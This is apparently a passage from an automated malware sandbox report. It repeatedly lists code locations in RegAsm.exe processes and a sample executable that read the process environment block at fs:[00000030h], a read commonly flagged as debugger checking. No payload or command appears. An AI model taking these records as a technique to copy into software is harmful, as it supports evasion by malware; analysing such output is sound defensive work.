          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD01CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD00AD mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD00AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FA23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC4015 mov eax, dword ptr fs:[00000030h]
